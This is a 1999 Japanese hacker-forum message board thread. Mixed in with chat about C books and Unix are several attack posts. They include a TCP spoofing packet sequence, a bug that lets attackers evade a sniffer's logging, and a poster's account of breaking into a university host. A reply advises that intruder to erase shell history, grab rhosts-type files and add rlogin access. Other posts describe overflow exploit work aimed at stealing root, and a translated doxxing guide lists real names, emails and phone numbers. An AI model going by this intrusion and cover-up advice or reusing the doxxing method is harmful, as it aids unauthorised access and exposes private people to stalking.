| 【メッセージ】 >「固定データのみの送信で終了する」モノが。 なんでしょうね〜 3wayが絡まないもの.. UDPでしょうかねぇ かつ、モノホンのホストがレスポンスを返す前に、パケットを 送る必要があるものですかね〜 うーん、それと、わりと新しいネタっぽいですね〜 なーんだーろなー(笑) >先こされるとクヤシイので、もごもごいっときます(笑) いやーん けちー!! きーー!!!! ていうか、気になって眠れないので何とかしてください(笑) |
| 【名 前】0e(でポストしたっけ(笑)) 【タイトル】re:(2)ども 05/19 23:05 |
|
| 【メッセージ】 んーと、spoofの使い道がない? なにいってんですかー、あるでしょ。 「固定データのみの送信で終了する」モノが。 先こされるとクヤシイので、もごもごいっときます(笑) #三角関数?とかならmath.hあたりインクルードすればふつーにコンパイルできるでは。 #ソースどっかに置いてみてもらったらどう?>しつもんのひと |
| 【名 前】ロコ 【タイトル】ルート権限について 05/19 22:18 |
takuou@anet.ne.jp |
| 【メッセージ】 こんばんは。 C言語の本の時はみなさん色々教えていただいてありがとうございました。これからも、書いてはコンパイルして・・・でがんばっていきます。 ただ、研究で使うプログラムで三角関数でエラーが出てまだわかってません・・・・ gccの本に >gcc -fnu-builtin program.c <ーたしかこんなふうだった・・ でコンパイルできるようにあったのですがなんでだろう・・・? 本題に入ります。 よくハックするにはルート権限で動いているプログラムを乗っ取ればいい。というようなことが書いてあるのを見るのですがこれは一体どう言うことなのですか? ルート権限のプログラムといったら各種deamonあとは、ルートの持ってる実行プログラム(あくまでも僕の今の知識でです。)なんかが出てくるのですが、それらを何とかして乗っ取るという事なのでしょうか? いまいちこのあたりのイメージがつかめてないので、どなたか教えて下さい。 おねがいします。 UNYUN>ペンギンいい感じです! ところで、コメントって DEF CON ZEROの 方でも書いてありましたっけ?(笑) |
| 【名 前】hsj 【タイトル】re:(1)ども 05/19 21:30 |
hsj@geocities.co.jp |
| 【メッセージ】 さっさとデータ投げてサーバのACKをカウントさせれば出来そうですね。 Pseudo-B -> Host-A SYN Seq(100) ・接続させて(はあと) Host-B <- Host-A SYN+ACK(101) Seq(1000) ・ほいほい Pseudo-B -> Host-A ACK(1001) Seq(101) ・うひ Pseudo-B -> Host-A ACK+PUSH(1001) Seq(101) DataLen(1) ・うひひ Host-B <- Host-A ACK(102) Seq(1001) ・よしよし Host-B -> Host-A RST+ACK(101) Seq(2000) ・!?そんなん知らんって! Host-B <- Host-A RST+ACK(2001) Seq(3000) ・ナニ言ってんの? こんな感じですか・・・。 注:あくまで予想、しかもテキトー でもSpoofingかける場合は、大抵ターゲットに近いマシンに化けると思うんで あんまり使い道が思いつかないなぁ・・・。 てか、この辺はreverseさんが詳しいかな? |
| 【名 前】TIP 【タイトル】おや、 05/19 13:51 |
tip@ijk.comhttp://filez.org |
| 【メッセージ】 うちも、BBSのデザインをちょこっと変えてみました。 ますますUG色が薄まりました(爆) 研究やら何やで、自分のサイトを充実させる時間がないのが 残念ですー。 |
| 【名 前】0e 【タイトル】re:(2)宣戦布告 05/19 13:41 |
|
| 【メッセージ】 ぅはは(笑) 心理的攻撃だ。ソーシャルだ。笑い てゆーか、かっこいいなぁ、これ(笑) 後ろの身長ラインが素敵。 |
| 【名 前】tbaba 【タイトル】re:(1)りにゅ 05/19 12:23 |
tbaba@unixuser.orghttp://www.unixuser.org/~tbaba/security/ |
| 【メッセージ】 To: UNYUN ちゃんとしてるっていうか手抜きというか(^^; アングラちっくというだけですしね :-) 私は防御側から見ているというだけですので. きちんと,こちらも時々情報源として利用してます(^^; 感謝感謝. |
| 【名 前】Akira 【タイトル】葉子win 05/19 06:12 |
|
| 【メッセージ】 ども Win95用の白木葉子落とさせて貰ったんですけど、 >"?"ボタンを押すとマニュアルが出ます。 となってるんですけど、txtがないよと言われてエラーになっちゃいます マニュアルなんていらんだろフィーリングでとか、 Unix版のReadme読めとか言われるとそれまでなんですけど、 気になったので |
| 【名 前】UNYUN 【タイトル】りにゅ 05/19 02:57 |
unewn4th@usa.net |
| 【メッセージ】 ちょっとづつレイアウトなんかを変えていこうと、 色々なペンギンのパクリ画像を集めちゅう。 あぁ、南極に行きたい... @Oeさん ちゃんと実験して確かめてないので、なんとも... ていうか、ちょっと試そうとプログラム作って色々 やってたら64kのSunOS4.1マシンが死んでしまいました(笑) 復活しないみたい。 なんだかな〜... カギ持ってないので、マシン置いてる部屋に入れないです(笑) @tbabaさん tbabaさんとこって、ちゃんとした表ページですよねー ウチみたいなアングラちっくなとこでウロウロしてると お堅い人たちに見つかって怒られないですか?(笑) 一応、ペンギンとしては、ここは「セキュリティ」なサイトの なつもりなんですけど... あんまり分かってくれないんです(笑) @hirokiさん はじめまして。 >突然ですが、はやくネットワークプログラミングの講座を >はじめて下さい!! あはは... 一応、上から順にやる予定だったんですけど、Rorrimさん 予定の上2つがまだなんで... 今ちょいと本業が忙しいので、片づき次第とりかかることにします。 それと、今見たらUDPがUCPになってる(笑) ひどいtypoですね。後でなおしとこ(汗) |
| 【名 前】UNYUN 【タイトル】re:(1)宣戦布告 05/19 01:21 |
unewn4th@usa.net |
| 【メッセージ】 武器弾薬の少ない弱小ペンギンは、ビラ配りしかできないので、 早速ビラを配ることにしました(笑) とりあえず、バナー代わりということで(笑) もう少ししたら、リニューアルするので、そん時には マトモなのに張り替えまーす |
| 【名 前】hiroki 【タイトル】お願いします。 05/19 00:10 |
virus@trynet.co.jp |
| 【メッセージ】 はじめまして、ひろきといいやす。 このページは、本当にCOOLですね、とても参考になっています。 突然ですが、はやくネットワークプログラミングの講座を はじめて下さい!!。お金が、無くて参考書を買えないもので とても楽しみにしてて・・・・ わがままだとわかっているのですが、 できる限り、早くお願いできれば・・・・ わたしは、C言語をやってる、プログラマーのはしくれです。 手が足りないのなら、できる限り手伝えます。 お願いします。。m(_ _)m ではでは。 |
| 【名 前】TrainCrash 【タイトル】re:宣戦布告 05/19 00:10 |
http://yokohama.cool.ne.jp/kt97526 |
| 【メッセージ】 >index変えてみました。 おお、ぺ、この胸はってるペンギン怖い(笑) なにか自慢することでもあったのかな? To:RZさん いつも授業中にテキストを印刷したものを 読ませていただいてます(笑) これからもタメになるテキストをよろしくお願いしますm(^_^)m |
| 【名 前】tbaba 【タイトル】re:(1)宣戦布告 05/18 23:18 |
tbaba@unixuser.orghttp://www.unixuser.org/~tbaba/security/199905.html#19990517-04 |
| 【メッセージ】 これいけてるっすね. うぅん.うちのpageもBannerとか作りたいなぁ... |
| 【名 前】RZ 【タイトル】宣戦布告 05/18 18:52 |
http://www.ugtop.com/defcon0/index2.htm |
| 【メッセージ】 じゃないので念のため(笑) index変えてみました。 これで800×600でも見えるはず。 |
| 【名 前】tbaba 【タイトル】re:(1)ども 05/18 18:03 |
tbaba@unixuser.orghttp://www.unixuser.org/~tbaba/security/199905.html#19990517-04 |
| 【メッセージ】 いや,そうとも言えないようですよ>SYN FLOOD FreeBSD 3.1-stableにはあったようです. holeが |
| 【名 前】0e 【タイトル】ども 05/18 16:53 |
|
| 【メッセージ】 スプーフの場合、騙りホストより先にパケットが届けばいいんですかね? もし仮にそうだとしたら、 「最も反応の遅いホスト」を探すだけでOKということに。 最近はSYN Floodなんて効かないでしょうから。 詳しい人おしえてください。 (今うちの実験サーバダウンちゅぅ。笑い) |
| 【名 前】White_E 【タイトル】re:(2)追い込み系の一例 05/18 01:04 |
white_e@iname.com |
| 【メッセージ】 フォローどうもです。あのテキスト、肝心のとどめの部分が vrfy なのが どうにも弱いですね…。もう少しまともなテキスト探してきます。 |
| 【名 前】なむ 【タイトル】re:(2)教えてください 05/17 20:11 |
|
| 【メッセージ】 紹介ありがとうございます。 このような種類ソフトで、パケットが出ていても実際に送信しない シミュレータみたいなものはないのでしょうか? やはり、空っぽのマシンで試すのが良いのでしょうか・・・。 なんとか用意して試してみます。 |
| 【名 前】はう 【タイトル】re:(1)れ 05/17 20:08 |
|
| 【メッセージ】 >どのように挙動不審なんですか? Windowsフォルダに自分のコピーみたいなのを作って、 それが毎回起動するようレジストリのRunに書き加えられてました(^^; 今のところクラッシュとかはないのですが、どういう情報が とられたのかわからないので、なにが起るかちょっと不安なのです。 |
| 【名 前】TrainCrash 【タイトル】UNIXの手に入れ方。 05/17 19:49 |
http://yokohama.cool.ne.jp/kt97526 |
| 【メッセージ】 >UNIXを無料でもらえる所ありませんか? 簡単に手に入れる方法としては、書店にいってCDのついてる LinuxかFreeBSD関係の本買えば手に入りますよ。 実売で1000強かな?僕もその口で手に入れました(笑) |
| 【名 前】tbaba 【タイトル】re:(1)教えてください 05/17 13:57 |
tbaba@unixuser.org |
| 【メッセージ】 これがどういったsoftwareだか全く判らないので, 何とも言えませんが. NukeNabber: http;//www.dynamsol.com/puppet/index.html TCPDump: http://netgroup-serv.polito.it/tools/analyzer/Install/windump/ 等のtoolでcheckしてみては如何でしょうか? # 怪しげなpacketがないかcheckしてみましょう. |
| 【名 前】UNYUN 【タイトル】れ 05/17 10:11 |
unewn4th@usa.net |
| 【メッセージ】 @じーぃさん FreeBSDは公式サイトが日本語アリなので初心者の方にはいいでしょう。 http://www.freebsd.org/ja/ @はうさん どのように挙動不審なんですか? |
| 【名 前】はう 【タイトル】教えてください 05/17 06:57 |
http://meltingpot.fortunecity.com/trinity/271/clock.zip |
| 【メッセージ】 不躾な質問で申し訳ありません。 このファイルを間違って実行してしまったのですが、挙動が不信なのです。 これってトロイなのでしょうか? 自分では良くわからないのでとても心配です(^^; |
| 【名 前】じーぃ 【タイトル】UNIXのフリーソフト手に入る所 05/15 12:13 |
|
| 【メッセージ】 UNIXを無料でもらえる所ありませんか? それと僕は初心者です、馬鹿らしいと思っているかもしれませんがよかったらおしえてください。 |
| 【名 前】UNYUN 【タイトル】re:(2)ていうか 05/15 08:52 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/gdd12.c |
| 【メッセージ】 >こういうバグ内包してるセキュリティツールないかなぁ・・・ sizeof(struct ip)長のバッファにip_hl*4だけmemcpyする バグがあったら、いろんな意味で楽しいですよね(笑) |
| 【名 前】0e 【タイトル】re:(1)ていうか 05/15 07:45 |
|
| 【メッセージ】 お、治ってますね。 なんつーか、tcp.hだけ__FAVOR_BSDのクセがぬけません(笑)>わたし ところで、こういうip_optがないことを想定している場合のexploitはむかしっから考えてました ルータではip_optをチェックしないものもあるんでないかとか・・・ tcpヘッダの先頭はポート番号で、これが8バイトつづくので ip_optにはちょうどいいのです。 gdd旧バージョンのexploitの場合、接続要求部分でip_optに、デフォルトぽーと番号以外の値、 例えば0x2222, 0x2222なんてやるとログに記録されません。 こういうバグ内包してるセキュリティツールないかなぁ・・・ わたしがみたなかでは、日本製のpackmonてやつが多分これでハングアップします(笑) |
| 【名 前】UNYUN 【タイトル】ていうか 05/15 02:07 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/gdd12.c |
| 【メッセージ】 LINUX用snifferのlinsnif666.cにも同じ問題があるようで... これもロギング回避できますね。 |
| 【名 前】UNYUN 【タイトル】修正(笑) 05/15 00:41 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/gdd12.c |
| 【メッセージ】 gdd Ver1.10にセキュリティホールが発見されました(苦笑) 内容は... 誰かが公開するexploitでも参考にしてくださいな。 一応、そこだけ直したのを速攻アップしました。 http://www.fortunecity.com/skyscraper/byte/551/tools/gdd12.c つか、ここのツールって、adminは使ってるんでしょうかねー ここ、アングラっぽいですからね(笑) |
| 【名 前】UNYUN 【タイトル】gdd 05/15 00:34 |
unewn4th@usa.net |
| 【メッセージ】 >いくらmainの上に書いてるからとはいえ。 >それにexternするのにも宣言書くのにラクなので(笑) 外部組み込みは想定してないです。 宣言は、そういうのがCの仕様だし、めんどいので(笑) >あと、define切ってる部分とかSUNOSから#ifやってるのに >NICだけlinuxが先なのもちょっとだけ気になりました これもアップ前に気になったんですけど、めんどいので 直さずにそのままアップしてました。 >sizeof( struct ip )でなくて >ip->ihl 4かも知れない。 ihl 4?? と思ったら、*が抜けてますね。 すんません、ココのBBSは*が使えないです。 今度からは、*だけ全角にしてくださいね。 だいたいのパケットは、1byte目は45なんですが、 たしかにその方が確実です。 ていうか、これ、サーバ管理者が使ってるならセキュリティ ホールになっちまいますね(笑) わははははーーー!! あーなんたることだー! 手製パケット送ってた時のをそのまんまコピペしたんで、 忘れてました(笑) ちゅうことで、exploit、お待ちしています(笑) |
| 【名 前】0e 【タイトル】re:(1)追い込み系の一例 05/14 23:25 |
|
| 【メッセージ】 ながいっすね(笑) っていうか、 >1)social security number よく分かりません。日本には無いのかも。 ないです。 これは多分社会保障番号ってやつで 全国民に番号を割り振ってるやつです。身分証明とかに使う。 日本でもこれが実現しそうなかんじ?かな? |
| 【名 前】0e 【タイトル】あと 05/14 22:57 |
|
| 【メッセージ】 sizeof( struct ip )でなくて ip->ihl 4かも知れない。 ぁぁアタマ痛くなってきた。 |
| 【名 前】White_E 【タイトル】追い込み系の一例 05/14 22:55 |
white_e@inamehttp://www.genocide2600.com/~tattooman/social-engineering/locate.html |
| 【メッセージ】 少し古典的かな?PSSより。 どのようにONLINEの人間を探し出すか…これは how to マニュアルだ。 まずあなたはNETSCAN32のコピーを持っておく必要がある。 もし無いならここをクリックして手に入れてくれ。 次にあなたはwinsockタイプのPPP接続が必要だ。これは自分で手に 入れてくれ。 開始 あなたは誰かを見つけたいだろう - 例えば彼らの本名を手に入れたり。 それが分かれば地方の図書館であなたは彼らの電話番号や住所を手に 入れられる。その情報を元に出生証明書が手に入るし、social security number(1)、運転免許証番号、クレジットカードの報告書、等々… 驚くべきことだろう!? このテキストの目的の為に、我々は最近なされたhackからいくつかの情報を 用いる。お決まりの情報も含んでいる。 こいつが私の探したクソ野郎だ gambit = gambit@sfsu.edu 最初のステップはNSlookupでIP addressを手に入れることだ。 >Translated Name: sfsu.edu > IP Address: 130.212.10.162 > IP Address: 115.102.115.117 > IP Address: 46.101.100.117 > IP Address: 0.41.0.5 > IP Address: 198.41.0.6 どのIPだと反応があるか、PINGしてみる。 もしIP addressを特定しなかったらtelnet可能かどうか調べられない。 それがあなたにログインを許可しなくても、他のはログインできるかも 知れない…全て試してみよう。 > Pinging sfsu.edu [130.212.10.162] with 48 data bytes > > Reply from 130.212.10.162: 48 bytes in 331 msec. TTL: 241 > Reply from 130.212.10.162: 48 bytes in 326 msec. TTL: 241 > Reply from 130.212.10.162: 48 bytes in 320 msec. TTL: 241 > Reply from 130.212.10.162: 48 bytes in 321 msec. TTL: 241 > No data received. > > PING Statistics for sfsu.edu 5 packets transmitted, 4 packets received, > 20% packet loss round-trip (ms) min/avg/max = 320/324/331 > Sending 48 data bytes to sfsu.edu [130.212.10.162] TRACEROUTEを走らせてみよう…。 これは地理的な一を知るのに役立つ(この場合はSanFrancisco)。 > 1:Received echo from ? [204.214.228.129] in 200 msec. > 2:Received echo from in-gw-e0/LIT.intellinet.com [204.182.227.1] in 209 msec. > 3:Received echo from sl-fw-11-S2/5-T1.sprintlink.net [144.228.131.49] in 229 msec. > 4:Received echo from sl-fw-5-F1/0.sprintlink.net [144.228.30.5] in 490 msec. > 5:Received echo from sl-kc-2-H2/0-T3.sprintlink.net [144.228.10.77] in 268 msec. > 6:Received echo from sl-chi-15-H2/0-T3.sprintlink.net [144.228.10.69] in 295 msec. > 7:Received echo from sl-chi-6-F0/0.sprintlink.net [144.228.50.6] in 277 msec. > 8:Received echo from sl-chi-nap-H1/0-T3.sprintlink.net [144.228.56.10] in 275 msec. > 9:Received echo from aads-F.mci.net [198.32.130.227] in 284 msec. > 10:Received echo from core3-hssi1-0.WillowSprings.mci.net [204.70.1.197] in 271 msec. > 11:Received echo from core1.Bloomington.mci.net [204.70.4.161] in 298 msec. > 12:Received echo from border1-fddi-0.Bloomington.mci.net [204.70.2.130] in 312 msec. > 13:Received echo from csunet-losnettos.Bloomington.mci.net [204.70.48.6] in 306 msec. > 14:Received echo from SanFrancisco-ATM-GW.CSU.NET [204.102.243.144] in 323 msec. > 15:Received 48 bytes from sfsu.edu [130.212.10.162] in 318 msec. > TraceRoute Statistics for sfsu.edu 15 packets transmitted, 15 packets received, > 0% packet loss round-trip (ms) min/avg/max = 200/290/490 推測は出来た - WHOISの出番だ - しかしサーバは rs ではなくて ds.internic.net を使おう。それはどこでも探索できる。 しかし彼はそこにはいなかった - いくつかのシステム管理者の名前と 住所と電話番号がリストされている。 >The ds.internic.net whois server is being queried: >Gaon, Brian D. (BDG6) bgaon@SFSUVAX1.SFSU.EDU San Francisco State University > 1600 Holloway Avenue San Francisco, CA 94132 (415) 338-2876 >Record last updated on 02-Jul-91. >The rs.internic.net whois server is being queried: >Baum, Amy (AB374) greenbd@SFSU.EDU 510.757.3333 Gonzalez, >Aurelio (AG344) aurelio@SFSU.EDU 415-276-0532 MacDonald, >C.j (CM1455) cjm@SFSU.EDU 415-752-9305 Naumann, >Jon (JL311) jnaumann@sfsu.edu (415) 338-1584 Riddle, >Stephen (SR1056) sriddle@SFSU.EDU 415-752-8512 Schmidt, >Heidi (HS30) heidis@SFSU.EDU 415-338-6175 Strickler, >Don (DS2362) dons@SFSU.EDU 415-338-3046 Tse, >Jack (JT124) jack@SFSU.EDU 415-338-2627 >The nic.ddn.mil whois server is being queried: >No match for mailbox "@SFSU.EDU". 今回私はサーバの代わりにGAMBITをwhoisした (彼はそこのアカウントを 持っていないかもしれない - それがspoofであったかも知れないから…)。 > Fried, Matt (MF236) gambit@MONADNOCK.KEENE.EDU (603)358-8028 > Gambit Automated Design Inc.(NET-NET-GAMBIT) NET-GAMBIT 204.30.212.0 > Gambit Automated Design Inc. (GAMBIT-DOM) > GAMBIT.COM Gambit BBS (GAMBITBBS-DOM) GAMBITBBS.COM > Gambit Communications, Inc. (GAMBITCOMM-DOM) GAMBITCOMM.COM > Gambit Media (GUAGENTI-DOM) GUAGENTI.COM > Gambit New Orleans Weekly (GAMBIT-NO-DOM) GAMBIT-NO.COM > Gambit Systems (GAMBITSYS-DOM) GAMBITSYS.COM > Nelson, Philip (PN218) gambit@VARMM.COM 318-322-8222 > Ritter, Russell (RR1116) gambit@CDSNET.NET 541.883.2028 ext.35 >The nic.ddn.mil whois server is being queried: >whois: connect: Connection refused There were a couple... to be sure Telnet into the mail server (port 19 or 25) like so : vrfy gambit@sfsu.edu 250 ALONZO SAMPSON San Francisco State University BASTARD(2)が見つかった…。 Directory Assistance に電話をかければこの大学のオペレータの 電話番号が分かる。彼らは電話番号や住所を教えてくれるだろう…。 University Operator - 415-338-1111 このシンプルな探索は完遂の為に通常より多くの段階を踏む必要があった。 Newsソフトやメーラにおけるヘッダー読みにも役立つだろう。 Enjoy... TATTOOMAN (1)social security number よく分かりません。日本には無いのかも。 (2)BASTARD 「運の悪い奴、不幸な者」の意 ……長文ですいません。 |
| 【名 前】0e 【タイトル】ちょとだけ 05/14 22:45 |
|
| 【メッセージ】 gddですけど、 関数宣言やったほうがいいと思います。 いくらmainの上に書いてるからとはいえ。 それにexternするのにも宣言書くのにラクなので(笑) あと、define切ってる部分とかSUNOSから#ifやってるのに NICだけlinuxが先なのもちょっとだけ気になりました。 |
| 【名 前】UNYUN 【タイトル】寝過ぎだっちゅうの 05/14 14:40 |
unewn4th@usa.net |
| 【メッセージ】 @RZさん スキャナー、マジで殺るんですかー!? んな、もったないじゃない... 殺るんだったらくださいよー。 あと、rootshell、ちょっと前からヘンですね。 なんででしょ。 @White_Eさん >“追い込み”の解説をしているものが結構有るんで驚いた。 心理的追い込みと言えば荒らしとかもですね。 その辺の専門家って、かなーり恐い(笑) |
| 【名 前】RZ 【タイトル】rootshellがヘン 05/14 14:09 |
|
| 【メッセージ】 バグってる(笑) っていうか2つのホストからデータが来るとこうなるのかな? 故意にやってみたいんだけど いまいちどうなってるのかわからない。。 HTMLはどうも1つっぽいんだけど・・・ |
| 【名 前】White_E 【タイトル】結局 05/14 08:03 |
white_e@iname.com |
| 【メッセージ】 Cの書けない者はSocialの腕を磨くしか無いのかな…。 それともSocialは本来最初のアカ取りだけに使うものなのだろうか。 最近Social関係のテキストに目を通していたら“騙し”ではなくて “追い込み”の解説をしているものが結構有るんで驚いた。 |
| 【名 前】( ´ー`) 【タイトル】re:(2)やばいんでしょうか? 05/13 21:31 |
|
| 【メッセージ】 root取れなかったら、 ....r..r..のファイルを片っ端から引っこ抜いておくとかもいいかも。 もはやここまで来ると居直り強盗みたいなモンですけど(笑) とりあえずヒストリー消して、自分にrloginと。 某所のNEWS OSははいらずじまいで 結局ふさがれてしまったなぁ・・・タイミング重要ですね。 っていうかスキャナうごかねー殺す。消す。しくしく・・・ 何故かUNIXのログファイル整合性チェックツールつくってたら ここに似たようなのあるのね。。(笑) |
| 【名 前】UNYUN 【タイトル】JAVA版 白木葉子 05/12 23:50 |
unewn4th@usa.net |
| 【メッセージ】 なんと! JAVA版の白木葉子なるものの存在を確認しました(笑) ひょんなことから、DPさんとお知り合いになったんですけど、 そん時に教えてもらいました。 http://www.fortunecity.com/skyscraper/byte/551/jsy.zip DPさん作です。 これで、マカーも葉子アターックできます。 |
| 【名 前】UNYUN 【タイトル】re:(2)ぐはっ 05/12 21:41 |
unewn4th@usa.net |
| 【メッセージ】 >あ、投稿フォームが変わってる。 えーごページは、もうこのくらいでイイでしょう(笑) >あの”間”は素敵でしたよ。笑い あ、あのアヤシイ朝鮮人風のHNの人ですね。 さっそく、 Oh... とかってメールが来ました(笑) >#ところでスキャナどーしても動きません。ファック! うむむ... 以外とクセモノなんですね。 普通のちょいミス以外が原因だとしたら、これは難解ですね。 ARP吐くって... 一体なんででしょねぇ... |
| 【名 前】RZ 【タイトル】re:(1)ぐはっ 05/12 20:06 |
|
| 【メッセージ】 あ、投稿フォームが変わってる。 なにかと思った(笑)ってか文字化けかと思った(笑) んで、バグトラクですけど あの”間”は素敵でしたよ。笑い #ところでスキャナどーしても動きません。ファック! |
| 【名 前】UNYUN 【タイトル】ぐはっ 05/12 17:32 |
unewn4th@usa.net |
| 【メッセージ】 バグトラックに小出しでネタを出そうと思ったら(笑)、パケット 荒らしがウチのサイトに来たらしく、exploitを全部持っていって 勝手に掲載してるやんかぁーー!! ぁ〜、なんたることだ〜 でも、パケット荒らしにはお世話になってるので、まぁヨシと しよう。 |
| 【名 前】SOL 【タイトル】見つけてきました 05/12 15:06 |
|
| 【メッセージ】 http://www.yrl.com/cgi-bin/resale/search2.cgi infoseek使うのを忘れていました。 最近、Yahooでダメな場合はgooで、それでもダメな時は あきらめてたので忘れてました。 で、いろいろ情報ありがとうございました。 |
| 【名 前】tbaba 【タイトル】Solaris でのunSUID 05/12 13:32 |
tbaba@unixuser.orghttp://www.unixuser.org/%7Etbaba/security/ |
| 【メッセージ】 前のpostで,Solaris FAQによると,unSUID可能とかいう話を しましたが, FAQにはそこまで書いてません. SUIDプログラムのlistだけですね. 訂正します ごめんなさい. # Security関連で作成しているpageで指摘されたてしまった(^^; |
| 【名 前】cr 【タイトル】hi 05/12 10:36 |
cr@rotten.com |
| 【メッセージ】 nice code - some english comments/info would be nice. |
| 【名 前】UNYUN 【タイトル】re:(2)もうすぐSparcのSolaris7をげっちゅ。うはは。 05/12 04:33 |
unewn4th@usa.net |
| 【メッセージ】 ぐははは。ハマってますね(笑) 私も、ちゃんと動いてくれん時って、壊したろかこいつぁ って思いますよ。ホント。 ちゅか私も今、O2を脅してるんですけど、どーも言うことを 聞かないです。 日本固有になるけど、IRIX全シリーズのWnn6におーばーふろー を発見。ちょうどトあるヤツ(せんせーともいう)のIRIX6.5の rootも欲しかったしっつーことで、6.4でuumをツツいてるんで すけど、ret、nop、shellcodeともイロイロやって書き込める ようになったのに、関数からretする前に落ちてるのか、 shellcodeが呼ばれない... ウゴケよ!っつーか、rootパス教えてくれ!(笑) |
| 【名 前】禍木 【タイトル】ちょっとビビり 05/12 01:24 |
|
| 【メッセージ】 >UNYUNさん レスありがとうございます。参考になりました。 置いてあった内容とかはよく見てなかったので(かなり焦ってました) まぁ、ISP強制退会くらいは覚悟しときます(笑)。 こうして初めて入手したアカウントは半永久的に闇に葬られていくのでした・・合掌。 では、Englishページ作り頑張ってください・・・って押しをひとつ(笑) >SOLさん http://www10.mediagalaxy.co.jp/orixrentec/ というのはどうでしょう。 中古で結構数が置いてあって、でもやっぱり高いです。 |
| 【名 前】れす 【タイトル】re:(1)もうすぐSparcのSolaris7をげっちゅ。うはは。 05/11 20:20 |
|
| 【メッセージ】 > おぉ、でけましたか。 > どんな具合ですか? 全く同じ構成(にしたつもり)なのに、 相手先にARPを送ってる・・・・ ナーンーデーダー ethなんて全然いじってないちゅーの・・・ファック!! で、別のプログラム動かしたらふつーに動いてる。 わっけわかりません。 てなわけでパニック中です(笑) |
| 【名 前】UNYUN 【タイトル】re:(2)C言語のいい本ないですか? 05/11 20:08 |
unewn4th@usa.net |
| 【メッセージ】 nightさん、いらっしゃーい しかし、Quick Cって、また、えらくなつしいですね。 しかもちょっとマイナーな所がイイ(笑) でも、言語仕様は似たようなものなので、昔のコンパイラ のマニュアルは、そういう意味ではかなりイイ参考書 になりますよね。 それと、最近外人からよくメールが来るんですけど、 えぃごページ作れってウルサイ... そのうち作るって答えてるけど、どーもめんどい... ほっといて、ハクされてもかなわんけど(笑) |
| 【名 前】night 【タイトル】re:(1)C言語のいい本ないですか? 05/11 19:51 |
|
| 【メッセージ】 私は、Quick Cの付属の分厚いリファレンスマニュアルを使っています C++Builderを使ってますが、この本を手放せません 中古ソフト屋に行けば格安で売っていると思います Dos時代のC言語のマニュアルなのでUNIXでもいけるはず |
| 【名 前】UNYUN 【タイトル】もうすぐSparcのSolaris7をげっちゅ。うはは。 05/11 19:21 |
unewn4th@usa.net |
| 【メッセージ】 @ハワイアンベイビーウッドローズさん おぉ、でけましたか。 どんな具合ですか? って、毎回、一瞬「誰だろ?」とか考えてしまうHNは イイ感じ(笑) @SOLさん 私も、ちょっち気になってinfoseekで「中古ワークステーション」 で探してみたんですけど、オモチャとして買うには、ちと 値が張りますね。SGIとかめちゃくちゃ高いし... 学生やってるといくら使ってもタダなんでイイっす(笑) |
| 【名 前】ハワイアンベイビーウッドローズ 【タイトル】メモリ共有 05/11 18:40 |
|
| 【メッセージ】 でけた。 ところがサクサク作ったプログラムなので 今見たらさっぱりわからん・・・・(笑) みなさん、コメントはキッチリつけときましょう。笑い ところで、cc & lintって本、ちょっとダサいけど使えるかも? てゆーかmanみれ。 |
| 【名 前】SOL 【タイトル】このBBSに、関係無いことかもしれませんが 05/11 18:08 |
|
| 【メッセージ】 Workstationを売っているお店、又はonline shop を知っている方は、教えてください。 値段なども、気になります。 SunのWorkstationを持つのが、夢なんです。 |
| 【名 前】Rorrim 【タイトル】re:(1)C言語のいい本ないですか? 05/11 18:02 |
49hack@usa.net |
| 【メッセージ】 ペンギンリファレンシズのC言語の本などいかがでしょうか? そう言えばそろそろ構造体のを書かなくっちゃ〜 ブル〜入ってるのに、忙しいな〜最近。 んじゃ、そういう事で(どういうこっちゃ:笑) |
| 【名 前】ロコ 【タイトル】C言語のいい本ないですか? 05/11 17:43 |
takuou@anet.ne.jp |
| 【メッセージ】 こんにちは! 連休明けて久しぶりに来ました。 アカデミーのコンテンツが増えてますね!これからも頑張って下さい。 ところで、研究室でCをやってるのですがエラーメッセージがよくわからず、市販されてる本もほとんどがVCなどでUNIX C としての本を探しています。アスキーの動物シリーズも少し見たのですがまだちょっとわかりにくいとこがあるようなレベルですが、何かいい本あったら紹介して下さい。お願いします。 |
| 【名 前】UNYUN 【タイトル】Packet Storm Security 05/11 02:49 |
unewn4th@usa.net |
| 【メッセージ】 どうでもいいけど、 >ex_dtprintinfo.c exploits a stack buffer overflow present in x86 versions >of Solaris 2.6 and 2.7. Local root compromise. ex_dtprintinfo.cのリンクには、Sparc版もついてるじゃないのよ。 |
| 【名 前】UNYUN 【タイトル】re:(1)やばいんでしょうか? 05/11 02:40 |
unewn4th@usa.nethttp://www.nec.co.jp/japanese/product/computer/ews4800/index.html |
| 【メッセージ】 >OSがNECのUX/4800とかいうよく知らないものだった上、 うわーぉ、私にはヨダレがでます(笑) こんなんにコンソールログインしたい使いたいもんです。 http://www.nec.co.jp/japanese/product/computer/ews4800/index.html に詳しい説明があります。 やばめかどうかということで言えば... 見つかればヤバいです。 どういう用途に使われてるかで、見つかる度合いは全然違いますけどね。 あと、置いてる内容にもよりますし。 更に、管理者がそういうのを嫌ってるか、会社や組織がそういう方針なら、かなーり ヤバいです。 でも、何もヤバいことしてないなら、見つかっても大事にはならんかもしれませんけど... ローカルで公認なroot持ってないOSに挑戦しても、やれることは限られてますから、 間違って侵入してしまったのは、なんとも不幸な事故っちゅうことで、しばらくは 触らぬ神にたたりナシの精神でいきましょう(笑) |
| 【名 前】禍木 【タイトル】やばいんでしょうか? 05/11 01:51 |
|
| 【メッセージ】 はじめまして禍木といいます。 ちょくちょくページの方は拝見させてもらっていますが、書き込みは初めてです。 一週間くらい前、とあるac.jpに間違って(笑)侵入できてしまったのですが 結局root取れずにログ消せませんでした。 OSがNECのUX/4800とかいうよく知らないものだった上、sendmailもqpopも 最新だったため、(ど)素人の私には手が打てなかったわけです。 侵入してやったことはパスファイルを覗こうとしたくらいですが、 (もちろんShadow化されてましたが)これってやばめなんでしょうか? Rorrimさんの投稿をみたら少し心配になってしまって・・・。 |
| 【名 前】UNYUN 【タイトル】re:(1)mk-2と申します!! 05/11 00:03 |
unewn4th@usa.net |
| 【メッセージ】 >事なのでしょうか?? できれば頂きたいですぅ。 あ、五右衛門の件なんですけど、調査不足でアレなんですが、 開発に携わってくれた人にも申し訳ないんで、とりあえず報告します... 実は、パスクラックツールの開発-配布ということが、ちょっちヤバイかも しれないんで、今のところ一般配布は延期しているんです。 でも、近いうちに何らかの形で配布すると思いますので、もうしばらく待ってて もらえますか?>ALL |
